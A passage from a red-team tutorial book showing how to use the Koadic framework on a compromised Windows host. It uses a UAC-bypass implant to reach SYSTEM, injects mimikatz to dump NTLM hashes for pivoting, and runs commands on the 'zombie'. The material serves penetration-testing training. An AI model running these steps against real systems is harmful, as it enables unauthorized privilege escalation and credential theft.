- Hands-On Red Team Tactics
- Himanshu Sharma Harpreet Singh
- 405字
- 2021-08-13 15:36:40
Running Implants
In this case, the bypassuac_eventvwr implant is used for escalating the privileges from ring 3 (user land privs) to SYSTEM. To use an implant, you can execute the following command:
use implant/elevate/bypassuac_eventvwr
The option is changed from stager to the implant now and just like we did it when configuring the stager, we need to configure the implant before executing it.
We can find the options by executing the following command:
Info
This will show two options that need to be configured for a successful implant execution: PAYLOAD and ZOMBIE. To set up the payload, execute the following command:
set payload 0
The question here is, why did we set the payload to 0? For understanding this, we need to reference the value from the Listeners command:
Listeners
The listeners command will list down all the stagers running. So, when the payload is set to 0 it means the payload will be using the given stager ID 0; that is, the MSHTA stager for implant delivery over to the zombie for execution.
The implant is now ready to be executed on the target system:
Run
At the time of execution, a new connection is created with the elevated privileges with zombie ID 2. On getting the information regarding the elevated connection, we can see clearly that the privileges were escalated with the * on the user field. The same is mentioned on the ID as well:
We can either use the implant for dumping hash or we can use mimikatz. Koadic supports mimikatz by injecting the DLL into the memory directly. To use mimikatz, run the following command:
use implant/inject/mimikatz_dynwrapx
You can run it directly without changing any settings:
run
By running the implant, we were able to fetch the NTLM hashes, which can further be used in pivoting.
To execute a command on a zombie we can use the exec_cmd implant, which can be run by executing the following command:
use implant/manage/exec_cmd
CMD option is the command that you want to execute. This implant will execute the command and save the result in a file that will be stored on the %TEMP% directory (as mentioned in the implant settings). We can change the directory accordingly but make sure the directory is writeable.
In this case, we will be executing a command to get the list of users on the system by setting cmd to net user:
set cmd "net user"
